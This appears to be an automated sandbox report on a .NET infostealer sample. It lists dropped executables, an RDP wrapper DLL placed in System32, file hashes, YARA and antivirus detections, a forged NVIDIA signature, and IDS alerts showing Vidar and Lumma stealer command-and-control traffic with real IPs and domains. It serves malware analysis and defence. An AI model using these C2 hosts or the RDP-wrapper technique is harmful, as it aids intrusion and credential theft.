Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.6533863237352735
Encrypted:	false
SSDEEP:	1536:a7xe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/prrDDhLO6kiz:a7x0I26z/8uz22gaxH2zpXD1O6Jz
MD5:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
SHA1:	B0C5D6768B041C992DB13ADBF9D1152EAE2DCFE4
SHA-256:	A50E7F2B8528539D7F9EEE179010F35C20AD3854E773E40A98023D594113653A
SHA-512:	055313B85862F58573A589785B3D6A63FF41B105FD78BD7956DFF7EC532075CC03954AE492F50562ED5FAA6850656570A22552C75A5E47EA768CED8893768AC6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............#... ...@....@.. ....................................`..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H............&...........-...............................................(#.....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r0..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....r...p(.....{....r...p(....(X...oY...(Z...b.:....rZ..p(.....o[....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Download File

Process:	C:\ProgramData\CFHIIEHJKK.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1785344
Entropy (8bit):	6.646511331349125
Encrypted:	false
SSDEEP:	24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
MD5:	C213162C86BB943BCDF91B3DF381D2F6
SHA1:	8EC200E2D836354A62F16CDB3EED4BB760165425
SHA-256:	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
SHA-512:	B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..\|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...\|..................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	5View capture file
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:/3PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPv:f
MD5:	03CBD866B0B726FB3D5BACE28DE06136
SHA1:	A99D5A7089574976569FB313279F0C5C9821A4A2
SHA-256:	C25F890FEF65F7853D461CB232C27B547B8518ED1D24A38DCBD30D64494EC4FA
SHA-512:	58FA4D107307F08A172ACD40C84EB56D9B65E6AD880E7AB04F19797B72C4A33AAC9275E14D870429C690845009A05297813A7AA1452E1827AAB8EAB307AA0ECD
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\rfxvmt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

**\Device\Mup\116938*\MAILSLOT\NET\NETLOGON**

Download File

Process:	C:\ProgramData\CFHIIEHJKK.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.7249034414266404
Encrypted:	false
SSDEEP:	3:Yl+trI2Y1An8wl+lLn:YcgG8JLn
MD5:	990BC2460C54374AB454FCA858B46588
SHA1:	870AD2B7307C3DE4BA86483D0161B21AE04BD70D
SHA-256:	6EB5E52633DEDF18285E39755CFF90FA2331B710250D4998539BB8707988DE12
SHA-512:	A073E882218C9111FFD1BA573A77C0BC038D1FD3B722EE8E24B46C81333BB9A8C2B3DE7745B1164688B29E579AFEC3369A38F274B07AB93444D72FBE7A795F67
Malicious:	false
Preview:	....1.1.6.9.3.8.....\MAILSLOT\NET\GETDC237FC04F.................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989388507815145
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	2ff6b812f5ca9d29a5007366f38b6f34
SHA1:	261344946fe8e06368b6385a0c815e1b99b89e49
SHA256:	2a8ad4c9af3031fde7d322613cfba967c63ff6e5657c74ba8693050039f07f6e
SHA512:	a13c60164006cce68c6c78ae654f1ecbe5ce7811807be73f8d362e64dc7e86d3d152dd6fbf2a61fa22e8fbd088f7b92c0e1b11e4fd76fd7b5ea3417224c42383
SSDEEP:	12288:mzWi1fvPOSuEnigNkKoU/YT+rz4VFTzqEO:OWi1f3OEiyoU/6+rzoTGt
TLSH:	87942371CB814610F9CA3CB978A1C7D61E34E3B2A79AD9FB455C58F4B34333016A8E52
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F5DA86 [Thu Sep 26 22:04:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x63ab0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x61c44	0x61e00	a74490c115ff5ce8c17e2ef71be189f2	False	0.9937714519476373	data	7.995779968314273	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x64000	0x5c8	0x600	db1daa9db276719b7dce2f7fee59adb7	False	0.4361979166666667	data	4.115782972549961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0xc	0x200	668ddc03321cdfb17f8be719cbc539e8	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x640a0	0x334	data			0.4426829268292683
RT_MANIFEST	0x643d8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T01:37:35.711646+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49711	5.75.211.162	443	TCP
2024-09-27T01:37:37.718574+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49712	5.75.211.162	443	TCP
2024-09-27T01:37:39.068861+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49713	5.75.211.162	443	TCP
2024-09-27T01:37:41.400790+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49714	5.75.211.162	443	TCP
2024-09-27T01:37:42.107429+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.7	49714	5.75.211.162	443	TCP
2024-09-27T01:37:42.107914+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.7	49714	TCP
2024-09-27T01:37:42.765181+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49715	5.75.211.162	443	TCP
2024-09-27T01:37:43.462268+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.7	49715	TCP
2024-09-27T01:37:44.274576+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49716	5.75.211.162	443	TCP
2024-09-27T01:37:45.209543+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49717	5.75.211.162	443	TCP
2024-09-27T01:37:48.389796+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49718	5.75.211.162	443	TCP
2024-09-27T01:37:49.463856+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49719	5.75.211.162	443	TCP
2024-09-27T01:37:50.826974+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49720	5.75.211.162	443	TCP
2024-09-27T01:37:51.776067+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49721	5.75.211.162	443	TCP
2024-09-27T01:37:53.505808+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49722	5.75.211.162	443	TCP
2024-09-27T01:37:55.262656+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49723	5.75.211.162	443	TCP
2024-09-27T01:37:56.811367+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49724	5.75.211.162	443	TCP
2024-09-27T01:37:58.248322+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49725	5.75.211.162	443	TCP
2024-09-27T01:37:59.524664+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49726	5.75.211.162	443	TCP
2024-09-27T01:38:02.538742+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49727	5.75.211.162	443	TCP
2024-09-27T01:38:04.020509+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49728	5.75.211.162	443	TCP
2024-09-27T01:38:05.369878+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49729	5.75.211.162	443	TCP
2024-09-27T01:38:06.928561+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49731	5.75.211.162	443	TCP
2024-09-27T01:38:08.852868+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49732	5.75.211.162	443	TCP
2024-09-27T01:38:10.898183+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49733	5.75.211.162	443	TCP
2024-09-27T01:38:12.492415+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49734	147.45.44.104	80	TCP
2024-09-27T01:38:13.634673+0200	2056176	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)	1	192.168.2.7	63092	1.1.1.1	53	UDP
2024-09-27T01:38:13.940509+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49735	5.75.211.162	443	TCP
2024-09-27T01:38:14.130220+0200	2056177	ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)	1	192.168.2.7	49736	172.67.194.216	443	TCP
2024-09-27T01:38:14.612339+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49736	172.67.194.216	443	TCP
2024-09-27T01:38:14.612339+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49736	172.67.194.216	443	TCP
2024-09-27T01:38:14.617053+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.7	55367	1.1.1.1	53	UDP
2024-09-27T01:38:15.051681+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49734	147.45.44.104	80	TCP
2024-09-27T01:38:15.091490+0200	2056165	ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)	1	192.168.2.7	49737	172.67.132.32	443	TCP
2024-09-27T01:38:15.531775+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49737	172.67.132.32	443	TCP
2024-09-27T01:38:15.531775+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49737	172.67.132.32	443	TCP
2024-09-27T01:38:15.546489+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.7	56659	1.1.1.1	53	UDP
2024-09-27T01:38:16.057991+0200	2056163	ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)	1	192.168.2.7	49739	188.114.96.3	443	TCP
2024-09-27T01:38:16.113824+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49738	5.75.211.162	443	TCP
2024-09-27T01:38:16.519151+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49739	188.114.96.3	443	TCP
2024-09-27T01:38:16.519151+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49739	188.114.96.3	443	TCP
2024-09-27T01:38:16.523200+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.7	57781	1.1.1.1	53	UDP
2024-09-27T01:38:17.012428+0200	2056161	ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)	1	192.168.2.7	49740	188.114.96.3	443	TCP
2024-09-27T01:38:17.237892+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.7	49734	147.45.44.104	80	TCP
2024-09-27T01:38:17.238598+0200	2827449	ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)	1	147.45.44.104	80	192.168.2.7	49734	TCP
2024-09-27T01:38:17.510845+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49740	188.114.96.3	443	TCP
2024-09-27T01:38:17.510845+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49740	188.114.96.3	443	TCP
2024-09-27T01:38:17.515826+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.7	60213	1.1.1.1	53	UDP
2024-09-27T01:38:17.990704+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49741	5.75.211.162	443	TCP
2024-09-27T01:38:18.038406+0200	2056159	ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)	1	192.168.2.7	49742	188.114.96.3	443	TCP
2024-09-27T01:38:18.552744+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49742	188.114.96.3	443	TCP
2024-09-27T01:38:18.552744+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49742	188.114.96.3	443	TCP
2024-09-27T01:38:18.558828+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.7	58425	1.1.1.1	53	UDP
2024-09-27T01:38:19.108263+0200	2056157	ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)	1	192.168.2.7	49744	172.67.162.108	443	TCP
2024-09-27T01:38:20.018932+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49744	172.67.162.108	443	TCP
2024-09-27T01:38:20.018932+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49744	172.67.162.108	443	TCP
2024-09-27T01:38:20.021116+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.7	59642	1.1.1.1	53	UDP
2024-09-27T01:38:20.256563+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49745	5.75.211.162	443	TCP
2024-09-27T01:38:20.501654+0200	2056155	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)	1	192.168.2.7	49746	188.114.96.3	443	TCP
2024-09-27T01:38:20.956709+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49746	188.114.96.3	443	TCP
2024-09-27T01:38:20.956709+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49746	188.114.96.3	443	TCP
2024-09-27T01:38:20.963294+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.7	57807	1.1.1.1	53	UDP
2024-09-27T01:38:21.440377+0200	2056153	ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)	1	192.168.2.7	49748	188.114.97.3	443	TCP
2024-09-27T01:38:21.731789+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.7	49747	45.132.206.251	80	TCP
2024-09-27T01:38:21.876920+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49748	188.114.97.3	443	TCP
2024-09-27T01:38:21.876920+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49748	188.114.97.3	443	TCP
2024-09-27T01:38:21.910689+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.7	59109	1.1.1.1	53	UDP
2024-09-27T01:38:22.448015+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.7	49749	104.21.77.130	443	TCP
2024-09-27T01:38:23.201154+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49749	104.21.77.130	443	TCP
2024-09-27T01:38:23.201154+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49749	104.21.77.130	443	TCP
2024-09-27T01:38:25.697143+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49751	172.67.128.144	443	TCP
2024-09-27T01:38:25.697143+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49751	172.67.128.144	443	TCP
2024-09-27T01:38:49.901702+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.7	49754	5.75.211.162	443	TCP
